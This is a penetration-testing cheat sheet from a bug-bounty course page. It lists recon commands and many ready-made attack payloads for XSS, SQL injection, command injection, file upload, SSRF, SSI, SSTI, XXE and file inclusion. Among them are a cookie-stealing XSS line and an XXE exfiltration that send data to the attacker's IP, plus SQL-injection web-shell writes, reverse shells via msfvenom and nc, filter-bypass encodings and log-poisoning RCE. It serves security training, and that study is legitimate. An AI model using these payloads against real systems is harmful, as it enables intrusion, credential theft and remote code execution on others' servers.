> For the complete documentation index, see [llms.txt](https://cyb3r.gitbook.io/pentestbook/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cyb3r.gitbook.io/pentestbook/courses/cbbh.md). # CBBH {% file src="/files/jUyqOzKxgwQLswHxfzI5" %} ## **Web Requests** #### cURL


Command	Description
`curl -s -O inlanefreight.com/index.html`	Download file
`curl -k https://inlanefreight.com`	Skip HTTPS (SSL) certificate validation
`curl inlanefreight.com -v`	Print full HTTP request/response details
`curl -I https://www.inlanefreight.com`	Send HEAD request (only prints response headers)
`curl -i https://www.inlanefreight.com`	Print response headers and response body
`curl https://www.inlanefreight.com -A 'Mozilla/5.0'`	Set User-Agent header
`curl -u admin:admin http://<SERVER_IP>:<PORT>/`	Set HTTP basic authorization credentials
`curl http://admin:admin@<SERVER_IP>:<PORT>/`	Pass HTTP basic authorization credentials in the URL
`curl -H 'Authorization: Basic YWRtaW46YWRtaW4=' http://<SERVER_IP>:<PORT>/`	Set request header
`curl 'http://<SERVER_IP>:<PORT>/search.php?search=le'`	Pass GET parameters
`curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/`	Send POST request with POST data
`curl -b 'PHPSESSID=c1nsa6op7vtk7kdis7bcnbadf1' http://<SERVER_IP>:<PORT>/`	Set request cookies
`curl -X POST -d '{"search":"london"}' -H 'Content-Type: application/json' http://<SERVER_IP>:<PORT>/search.php`	Send POST request with JSON data

#### APIs


Command	Description
`curl http://<SERVER_IP>:<PORT>/api.php/city/london`	Read entry
`curl -s http://<SERVER_IP>:<PORT>/api.php/city/ \| jq`	Read all entries
`curl -X POST http://<SERVER_IP>:<PORT>/api.php/city/ -d '{"city_name":"HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'`	Create (add) entry
`curl -X PUT http://<SERVER_IP>:<PORT>/api.php/city/london -d '{"city_name":"New_HTB_City", "country_name":"HTB"}' -H 'Content-Type: application/json'`	Update (modify) entry
`curl -X DELETE http://<SERVER_IP>:<PORT>/api.php/city/New_HTB_City`	Delete entry

## **Information Gathering** #### WHOIS | Command | Description | | ---------------------------- | ----------------------------------------- | | `nslookup ` | Identify A record for the target domain. | | `export TARGET="domain.tld"` | Assign target to an environment variable. | | `whois $TARGET` | WHOIS lookup for the target. | #### DNS Enumeration

Command	Description
`nslookup $TARGET`	Identify the A record for the target domain.
`nslookup -query=A $TARGET`	Identify the A record for the target domain.
`dig <TARGET> @<nameserver/IP>`	Identify the A record for the target domain.
`dig a $TARGET @<nameserver/IP>`	Identify the A record for the target domain.
`nslookup -query=PTR <IP>`	Identify the PTR record for the target IP address.
`dig -x <IP> @<nameserver/IP>`	Identify the PTR record for the target IP address.
`nslookup -query=ANY $TARGET`	Identify ANY records for the target domain.
`dig any $TARGET @<nameserver/IP>`	Identify ANY records for the target domain.
`nslookup -query=TXT $TARGET`	Identify the TXT records for the target domain.
`dig txt $TARGET @<nameserver/IP>`	Identify the TXT records for the target domain.
`nslookup -query=MX $TARGET`	Identify the MX records for the target domain.
`dig mx $TARGET @<nameserver/IP>`	Identify the MX records for the target domain.

#### Passive Subdomain Enumeration

Resource/Command	Description
VirusTotal	https://www.virustotal.com/gui/home/url
Censys	https://censys.io/
Crt.sh	https://crt.sh/
`curl -s https://sonar.omnisint.io/subdomains/{domain} \| jq -r '.[]' sort -u`	All subdomains for a given domain.
`curl -s https://sonar.omnisint.io/tlds/{domain} jq -r '.[]' sort -u`	All TLDs found for a given domain.
`curl -s https://sonar.omnisint.io/all/{domain} jq -r '.[]' sort -u`	All results across all TLDs for a given domain.
`curl -s https://sonar.omnisint.io/reverse/{ip} jq -r '.[]' sort -u`	Reverse DNS lookup on IP address.
`curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} jq -r '.[]' sort -u`	Reverse DNS lookup of a CIDR range.
`curl -s "https://crt.sh/?q=${TARGET}&output=json" jq -r '.[] "\(.name_value)\n\(.common_name)"' sort -u`

#### Certificate Transparency. {% code overflow="wrap" %} ```bash cat sources.txt \| while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done ``` {% endcode %} Searching for subdomains and other information on the sources provided in the source.txt list. {% code overflow="wrap" %} ```bash curl -s "https://crt.sh/?q=%25.example.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ``` {% endcode %} This command fetches JSON-formatted data from `crt.sh` for `example.com` (the `%` is a wildcard), extracts domain names using `jq`, removes any wildcard prefixes (`*.`) with `sed`, and finally sorts and deduplicates the results. #### Passive Infrastructure Identification

Resource/Command	Description
Netcraft	https://www.netcraft.com/
WayBackMachine	http://web.archive.org/
WayBackURLs	https://github.com/tomnomnom/waybackurls
`waybackurls -dates https://$TARGET > waybackurls.txt`	Crawling URLs from a domain with the date it was obtained.

#### Active Infrastructure Identification

Resource/Command	Description
`curl -I "http://${TARGET}"`	Display HTTP headers of the target webserver.
`whatweb -a https://www.facebook.com -v`	Technology identification.
Wappalyzer	https://www.wappalyzer.com/
`wafw00f -v https://$TARGET`	WAF Fingerprinting.
Aquatone	https://github.com/michenriksen/aquatone
`cat subdomain.list aquatone -out ./aquatone -screenshot-timeout 1000`	Makes screenshots of all subdomains in the
subdomain.list.

#### Active Subdomain Enumeration

Resource/Command	Description
HackerTarget	https://hackertarget.com/zone-transfer/
SecLists	https://github.com/danielmiessler/SecLists
`nslookup -type=any -query=AXFR $TARGET nameserver.target.domain`	Zone Transfer using Nslookup against the target domain and its nameserver.
`gobuster dns -q -r "${NS}" -d "${TARGET}" -w "${WORDLIST}" -p ./patterns.txt -o "gobuster_${TARGET}.txt"`	Bruteforcing subdomains.

#### Virtual Hosts

Resource/Command	Description
`curl -s http://192.168.10.10 -H "Host: randomtarget.com"`	Changing the HOST HTTP header to request a specific domain.
`cat ./vhosts.list while read vhost;do echo "\n******\nFUZZING: ${vhost}\n******";curl -s -I http://<IP address> -H "HOST: ${vhost}.target.domain" \| grep "Content-Length: ";done`	Bruteforcing for possible virtual hosts on the target domain.
`ffuf -w ./vhosts -u http://<IP address> -H "HOST: FUZZ.target.domain" -fs 612`	Bruteforcing for possible virtual hosts on the target domain using ffuf.

```bash gobuster vhost -u http://192.0.2.1 -w hostnames.txt ``` #### Crawling

Resource/Command	Description
`ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt`	Discovering files and folders that cannot be spotted by browsing the website.
`ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSIONS`	Mutated bruteforcing against the target web server.

Here's a basic Scrapy spider example to extract links from `example.com`: ```python import scrapy class ExampleSpider(scrapy.Spider): name = "example" start_urls = ['http://example.com/'] def parse(self, response): for link in response.css('a::attr(href)').getall(): if any(link.endswith(ext) for ext in self.interesting_extensions): yield {"file": link} elif not link.startswith("#") and not link.startswith("mailto:"): yield response.follow(link, callback=self.parse) ``` {% code overflow="wrap" %} ```bash jq -r '.[] | select(.file != null) | .file' example_data.json | sort -u ``` {% endcode %} ## **Attacking Web Applications with Ffuf**


Command	Description
`ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ`	Directory Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ`	Extension Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php`	Page Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v`	Recursive Fuzzing
`ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/`	Subdomain Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx`	VHost Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx`	Parameter Fuzzing
`ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx`	Parameter Fuzzing
`ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx`	Value Fuzzing

#### Wordlists


Command	Description
`/opt/useful/seclists/Discovery/Web-Content/directory-list-2.3-small.txt`	Directory Wordlist
`/opt/useful/seclists/Discovery/Web-Content/web-extensions.txt`	Extensions Wordlist
`/opt/useful/seclists/Discovery/DNS/subdomains-top1million-5000.txt`	Domain Wordlist
`/opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt`	Parameters Wordlist

#### Misc


Command	Description
`sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts'`	Add DNS entry
`for i in $(seq 1 1000); do echo $i >> ids.txt; done`	Create Sequence Wordlist

## **JavaScript Deobfuscation** | **Website** | **Description** | | ------------------------------------------- | --------------- | | [JS Console](https://jsconsole.com/) | | | [Prettier](https://prettier.io/playground/) | | | [Beautifier](https://beautifier.io/) | | | [JSNice](http://www.jsnice.org/) | | | [JSCompress](https://jscompress.com/) | Minify JS code | ## **Cross-Site Scripting (XSS)**

Code	Description
`<script>alert(window.origin)</script>`	Basic XSS Payload
`<plaintext>`	Basic XSS Payload
`<script>print()</script>`	Basic XSS Payload
`<img src="" onerror=alert(window.origin)>`	HTML-based XSS Payload
`<script>document.body.style.background = "#141d2b"</script>`	Change Background Color
`<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>`	Change Background Image
`<script>document.title = 'HackTheBox Academy'</script>`	Change Website Title
`<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>`	Overwrite website's main body
`<script>document.getElementById('urlform').remove();</script>`	Remove certain HTML element
`<script src="http://OUR_IP/script.js"></script>`	Load remote script
`<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>`	Send Cookie details to us
`python xsstrike.py -u "http://SERVER_IP:PORT/index.php?task=test"`	Run `xsstrike` on a url parameter

## **SQL Injection** #### MySQL


Command	Description
General
`mysql -u root -h docker.hackthebox.eu -P 3306 -p`	login to mysql database
`SHOW DATABASES`	List available databases
`USE users`	Switch to database
Tables
`CREATE TABLE logins (id INT, ...)`	Add a new table
`SHOW TABLES`	List available tables in current database
`DESCRIBE logins`	Show table properties and columns
`INSERT INTO table_name VALUES (value_1,..)`	Add values to table
`INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)`	Add values to specific columns in a table
`UPDATE table_name SET column1=newvalue1, ... WHERE <condition>`	Update table values
Columns
`SELECT * FROM table_name`	Show all columns in a table
`SELECT column1, column2 FROM table_name`	Show specific columns in a table
`DROP TABLE logins`	Delete a table
`ALTER TABLE logins ADD newColumn INT`	Add new column
`ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn`	Rename column
`ALTER TABLE logins MODIFY oldColumn DATE`	Change column datatype
`ALTER TABLE logins DROP oldColumn`	Delete column
Output
`SELECT * FROM logins ORDER BY column_1`	Sort by column
`SELECT * FROM logins ORDER BY column_1 DESC`	Sort by column in descending order
`SELECT * FROM logins ORDER BY column_1 DESC, id ASC`	Sort by two-columns
`SELECT * FROM logins LIMIT 2`	Only show first two results
`SELECT * FROM logins LIMIT 1, 2`	Only show first two results starting from index 2
`SELECT * FROM table_name WHERE <condition>`	List results that meet a condition
`SELECT * FROM logins WHERE username LIKE 'admin%'`	List results where the name is similar to a given string

#### MySQL Operator Precedence * Division (`/`), Multiplication (`*`), and Modulus (`%`) * Addition (`+`) and Subtraction (`-`) * Comparison (`=`, `>`, `<`, `<=`, `>=`, `!=`, `LIKE`) * NOT (`!`) * AND (`&&`) * OR (`||`) #### SQL Injection


Payload	Description
Auth Bypass
`admin' or '1'='1`	Basic Auth Bypass
`admin')-- -`	Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
`' order by 1-- -`	Detect number of columns using `order by`
`cn' UNION select 1,2,3-- -`	Detect number of columns using Union injection
`cn' UNION select 1,@@version,3,4-- -`	Basic Union injection
`UNION select username, 2, 3, 4 from passwords-- -`	Union injection for 4 columns
DB Enumeration
`SELECT @@version`	Fingerprint MySQL with query output
`SELECT SLEEP(5)`	Fingerprint MySQL with no output
`cn' UNION select 1,database(),2,3-- -`	Current database name
`cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -`	List all databases
`cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -`	List all tables in a specific database
`cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -`	List all columns in a specific table
`cn' UNION select 1, username, password, 4 from dev.credentials-- -`	Dump data from a table in another database
Privileges
`cn' UNION SELECT 1, user(), 3, 4-- -`	Find current user
`cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -`	Find if user has admin privileges
`cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -`	Find if all user privileges
`cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -`	Find which directories can be accessed through MySQL
File Injection
`cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -`	Read local file
`select 'file written successfully!' into outfile '/var/www/html/proof.txt'`	Write a string to a local file
`cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -`	Write a web shell into the base web directory

### **SQLMap**


Command	Description
`sqlmap -hh`	View the advanced help menu
`sqlmap -u "http://www.example.com/vuln.php?id=1" --batch`	Run `SQLMap` without asking for user input
`sqlmap 'http://www.example.com/' --data 'uid=1&name=test'`	`SQLMap` with POST request
`sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'`	POST request specifying an injection point with an asterisk
`sqlmap -r req.txt`	Passing an HTTP request file to `SQLMap`
`sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'`	Specifying a cookie header
`sqlmap -u www.target.com --data='id=1' --method PUT`	Specifying a PUT request
`sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt`	Store traffic to an output file
`sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch`	Specify verbosity level
`sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"`	Specifying a prefix or suffix
`sqlmap -u www.example.com/?id=1 -v 3 --level=5`	Specifying the level and risk
`sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba`	Basic DB enumeration
`sqlmap -u "http://www.example.com/?id=1" --tables -D testdb`	Table enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname`	Table/row enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"`	Conditional enumeration
`sqlmap -u "http://www.example.com/?id=1" --schema`	Database schema enumeration
`sqlmap -u "http://www.example.com/?id=1" --search -T user`	Searching for data
`sqlmap -u "http://www.example.com/?id=1" --passwords --batch`	Password enumeration and cracking
`sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"`	Anti-CSRF token bypass
`sqlmap --list-tampers`	List all tamper scripts
`sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba`	Check for DBA privileges
`sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"`	Reading a local file
`sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"`	Writing a file
`sqlmap -u "http://www.example.com/?id=1" --os-shell`	Spawning an OS shell

## **Command Injections** #### Injection Operators


Injection Operator	Injection Character	URL-Encoded Character	Executed Command
Semicolon	`;`	`%3b`	Both
New Line		`%0a`	Both
Background	`&`	`%26`	Both (second output generally shown first)
Pipe	`\|`	`%7c`	Both (only second output is shown)
AND	`&&`	`%26%26`	Both (only if first succeeds)
OR	`\|\|`	`%7c%7c`	Second (only if first fails)
Sub-Shell	``	`%60%60`	Both (Linux-only)
Sub-Shell	`$()`	`%24%28%29`	Both (Linux-only)

*** #### Linux #### Filtered Character Bypass

Code	Description
`printenv`	Can be used to view all environment variables
Spaces
`%09`	Using tabs instead of spaces
`${IFS}`	Will be replaced with a space and a tab. Cannot be used in sub-shells (i.e. `$()`)
`{ls,-la}`	Commas will be replaced with spaces
Other Characters
`${PATH:0:1}`	Will be replaced with `/`
`${LS_COLORS:10:1}`	Will be replaced with `;`
`$(tr '!-}' '"-~'<<<[)`	Shift character by one (`[` -> `\`)

*** #### Blacklisted Command Bypass | Code | Description | | ------------------------------------------------------------ | ----------------------------------- | | **Character Insertion** | | | `'` or `"` | Total must be even | | `$@` or `\` | Linux only | | **Case Manipulation** | | | `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases | | `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique | | **Reversed Commands** | | | `echo 'whoami' \| rev` | Reverse a string | | `$(rev<<<'imaohw')` | Execute reversed command | | **Encoded Commands** | | | `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 | | `bash<<<$(base64 -d<<CodeDescriptionGet-ChildItem Env:Can be used to view all environment variables - (PowerShell)Spaces%09Using tabs instead of spaces%PROGRAMFILES:~10,-5%Will be replaced with a space - (CMD)$env:PROGRAMFILES[10]Will be replaced with a space - (PowerShell)Other Characters%HOMEPATH:~0,-17%Will be replaced with \ - (CMD)$env:HOMEPATH[0]Will be replaced with \ - (PowerShell) *** #### Blacklisted Command Bypass

Code	Description
Character Insertion
`'` or `"`	Total must be even
`^`	Windows only (CMD)
Case Manipulation
`WhoAmi`	character with odd cases
Reversed Commands
`"whoami"[-1..-20] -join ''`	Reverse a string
`iex "$('imaohw'[-1..-20] -join '')"`	Execute reversed command
Encoded Commands
`[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))`	Encode a string with base64
`iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"`	Execute b64 encoded string

#### Separator Characters > List of injection characters and matching URL encoded as wordlist of possible separators: ```bash ; %3b \n %0a & %26 | %7c && %26%26 || %7c%7c `` %60%60 $() %24%28%29 ``` #### Obfuscated Commands > List of commands obfuscated as wordlist to test possible WAF filter bypass: ```bash uname u'n'a'm'e ${uname} $(uname) {uname} $(rev<<<'emanu') bash<<<$(base64 -d<< Character Injection - Before/After Extension to generate list of possible filenames to bypass file upload filters on white or black listings. ```bash for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do for ext in '.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm'; do echo "shell$char$ext.jpg" >> filenames_wordlist.txt echo "shell$ext$char.jpg" >> filenames_wordlist.txt echo "shell.jpg$char$ext" >> filenames_wordlist.txt echo "shell.jpg$ext$char" >> filenames_wordlist.txt done done ``` #### Web Shells


Web Shell	Description
`<?php file_get_contents('/etc/passwd'); ?>`	Basic PHP File Read
`<?php system('hostname'); ?>`	Basic PHP Command Execution
`<?php system($_REQUEST['cmd']); ?>`	Basic PHP Web Shell
`<% eval request('cmd') %>`	Basic ASP Web Shell
`msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php`	Generate PHP reverse shell
PHP Web Shell	PHP Web Shell
PHP Reverse Shell	PHP Reverse Shell
Web/Reverse Shells	Seclists Web Shells
https://www.revshells.com/	Automated reverse shell

#### Bypasses | **Command** | **Description** | | ------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------- | | **Blacklist Bypass** | | | `shell.phtml` | Uncommon Extension | | `shell.pHp` | Case Manipulation | | [PHP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Extension%20PHP/extensions.lst) | List of PHP Extensions | | [ASP Extensions](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/Extension%20ASP) | List of ASP Extensions | | [Web Extensions](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-extensions.txt) | List of Web Extensions | | **Whitelist Bypass** | | | `shell.jpg.php` | Double Extension | | `shell.php.jpg` | Reverse Double Extension | | `%20`, `%0a`, `%00`, `%0d0a`, `/`, `.\`, `.`, `…` | Character Injection - Before/After Extension | | **Content/Type Bypass** | | | [Web Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) | List of Web Content-Types | | [Content-Types](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/web-all-content-types.txt) | List of All Content-Types | | [File Signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) | List of File Signatures/Magic Bytes | #### Limited Uploads | **Potential Attack** | **File Types** | | -------------------- | ----------------------- | | `XSS` | HTML, JS, SVG, GIF | | `XXE`/`SSRF` | XML, SVG, PDF, PPT, DOC | | `DoS` | ZIP, JPG, PNG | ## **Login Brute Forcing** ```bash hydra [-l LOGIN|-L FILE] [-p PASS|-P FILE] [-C FILE] -m MODULE [service://server[:PORT][/OPT]] medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT] medusa -h 192.168.1.100 -u admin -P passwords.txt -M ssh medusa -h www.example.com -U users.txt -P passwords.txt -M http -m GET ```

Command	Description
`hydra -C wordlist.txt SERVER_IP -s PORT http-get /`	Basic Auth Brute Force
`hydra -L wordlist.txt -P wordlist.txt -u -f SERVER_IP -s PORT http-get /`	Basic Auth Brute Force
`hydra -l admin -P wordlist.txt -f SERVER_IP -s PORT http-post-form "/login.php:username=^USER^&password=^PASS^:F=<form name='login'"`	Login Form Brute Force
`hydra -L bill.txt -P william.txt -u -f ssh://SERVER_IP:PORT -t 4`	SSH Brute Force
`cupp -i`	Creating Custom Password Wordlist
`sed -ri '/^.{,7}$/d' william.txt`	Remove Passwords Shorter Than 8
sed -ri '/[!-/:-@\[-`\{-~]+/!d' william.txt	Remove Passwords With No Special Chars
`sed -ri '/[0-9]+/!d' william.txt`	Remove Passwords With No Numbers
`./username-anarchy Bill Gates > bill.txt`	Generate Usernames List

## Server side request forgery SSRF #### **Protocols** {% code overflow="wrap" %} ```http http://127.0.0.1/ file:///etc/passwd gopher://dateserver.htb:80/_POST%20/admin.php%20HTTP%2F1.1%0D%0AHost:%20dateserver.htb%0D%0AContent-Length:%2013%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0A%0D%0Aadminpw%3Dadmin ``` {% endcode %}

Command	Description
`curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:8080"`	Testing for SSRF vulnerability
`curl -i -s "http://<TARGET IP>/load?q=http://<VPN/TUN Adapter IP>:9090/index.html"`	Retrieving a remote file through the target application (HTTP Schema)
`curl -i -s "http://<TARGET IP>/load?q=file:///etc/passwd"`	Retrieving a local file through the target application (File Schema)
`for port in {1..65535};do echo $port >> ports.txt;done`	Generating a wordlist of possible ports
`ffuf -w ./ports.txt:PORT -u "http://<TARGET IP>/load?q=http://127.0.0.1:PORT" -fs 30`	Fuzzing for ports on the internal interface
`curl -i -s "http://<TARGET IP>/load?q=http://127.0.0.1:5000"`	Interacting with the internal interface on the discovered port
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=index.html"`	Interacting with the internal application
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http://127.0.0.1:1"`	Discovering web application listening in on localhost
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:1"`	Modifying the URL to bypass the error message
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///proc/self/environ" -o -`	Requesting to disclose the /proc/self/environ file on the internal application
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=file:://///app/internal_local.py"`	Retrieving a local file through the target application
`curl -i -s "http://<TARGET IP>/load?q=http://internal.app.local/load?q=http::////127.0.0.1:5000/runme?x=whoami"`	Confirming remote code exeuction on the remote host

## SSI Injection #### SSI Directive Payload Description


Print variables	`<!--#printenv -->`
Change config	`<!--#config errmsg="Error!" -->`
Print specific variable	`<!--#echo var="DOCUMENT_NAME" var="DATE_LOCAL" -->`
Execute command	`<!--#exec cmd="whoami" -->`
Date	`<!--#echo var="DATE_LOCAL" -->`
Include web file	`<!--#include virtual="index.html" -->`
Reverse Shell	`<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo /bin/bash 1>/tmp/foo;rm /tmp/foo" -->`

## SSTI

Command	Description
`${{<%[%'"}}%.`	Test String
`${7*7}`	Spring payload
`{{_self.env.display("TEST"}}`	Twig payload
`{{config.items()}}`	Jinja2 basic injection
`{{ [].class.base.subclasses() }}`	Jinja2 dump all classes payload
`{% import os %}{{os.system('whoami')}}`	Tornado payload
`{{7*'7'}}`	Confirming Jinja2 backend
`./tplmap.py -u 'http://<TARGET IP>:<PORT>/execute?cmd'`	Automating with tplmap

## XSLT Injection

<xsl:template>	 # This element indicates an XSL template. It can contain a match attribute that contains a path in the XML-document that the template applies to
<xsl:value-of>	 # This element extracts the value of the XML node specified in the select attribute
<xsl:for-each>	 # This elements enables looping over all XML nodes specified in the select attribute
<xsl:sort>	 # This element specifies the node to sort elements in a for loop by in the select argument. Additionally, a sort order may be specified in the order argument
<xsl:if>	 # This element can be used to test for conditions on a node. The condition is specified in the test argument

# Injection Payloads
# Information Disclosure
<xsl:value-of select="system-property('xsl:version')" />
<xsl:value-of select="system-property('xsl:vendor')" />
<xsl:value-of select="system-property('xsl:vendor-url')" />
<xsl:value-of select="system-property('xsl:product-name')" />
<xsl:value-of select="system-property('xsl:product-version')" />

# LFI
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')" />
<xsl:value-of select="php:function('file_get_contents','/etc/passwd')" />

# RCE
<xsl:value-of select="php:function('system','id')" />

## XXE


Code	Description
`<!ENTITY xxe SYSTEM "http://localhost/email.dtd">`	Define External Entity to a URL
`<!ENTITY xxe SYSTEM "file:///etc/passwd">`	Define External Entity to a file path
`<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php">`	Read PHP source code with base64 encode filter
`<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">`	Reading a file through a PHP error
`<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">`	Reading a file OOB exfiltration

## **File Inclusion** ### Local File Inclusion LFI | **Command** | **Description** | | ------------------------------------------------------------------------------------------------- | --------------------------------------------------------- | | `/etc/passwd` | Basic LFI | | `../../../../etc/passwd` | LFI with path traversal | | `....//....//....//....//etc/passwd` | Bypass basic path traversal filter | | `%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64` | Bypass filters with URL encoding | | `/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]` | Bypass appended extension with path truncation (obsolete) | | `../../../../etc/passwd%00` | Bypass appended extension with null byte (obsolete) | | `php://filter/read=convert.base64-encode/resource=config` | Read PHP with base64 filter | ### Remote Code Execution | **Command** | **Description** | | --------------------------------------------------------------------------------------------------------------------------- | ------------------------------------- | | **PHP Wrappers** | | | `data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id` | RCE with data wrapper | | `curl -s -X POST --data '' "http://:/index.php?language=php://input&cmd=id"` | RCE with input wrapper | | `http://:/index.php?language=expect://id` | RCE with expect wrapper | | **RFI** | | | `echo '' > shell.php && python3 -m http.server ` | Host web shell | | `/index.php?language=http://:/shell.php&cmd=id` | Include remote PHP web shell | | **LFI + Upload** | | | `echo 'GIF8' > shell.gif` | Create malicious image | | `/index.php?language=./profile_images/shell.gif&cmd=id` | RCE with malicious uploaded image | | `echo '' > shell.php && zip shell.jpg shell.php` | Create malicious zip archive 'as jpg' | | `/index.php?language=zip://shell.zip%23shell.php&cmd=id` | RCE with malicious uploaded zip | | `php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg` | Create malicious phar 'as jpg' | | `/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id` | RCE with malicious uploaded phar | | **Log Poisoning** | | | `/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd` | Read PHP session parameters | | `%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E` | Poison PHP session with web shell | | `/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id` | RCE through poisoned PHP session | | `curl -s "http://:/index.php" -A ''` | Poison server log | | `/var/log/apache2/access.log&cmd=id` | RCE through poisoned PHP session | | `C:\xampp\apache\logs\` | Apache log files on windows *XAMPP* | ```powershell # PHP Wrappers php://filter/read=string.rot13/resource=index.php php://filter/convert.iconv.utf-8.utf-16/resource=index.php php://filter/convert.base64-encode/resource=index.php pHp://FilTer/convert.base64-encode/resource=index.php php://filter/zlib.deflate/convert.base64-encode/resource=index.php data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=dir expect://id expect://ls ``` #### Misc | [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) 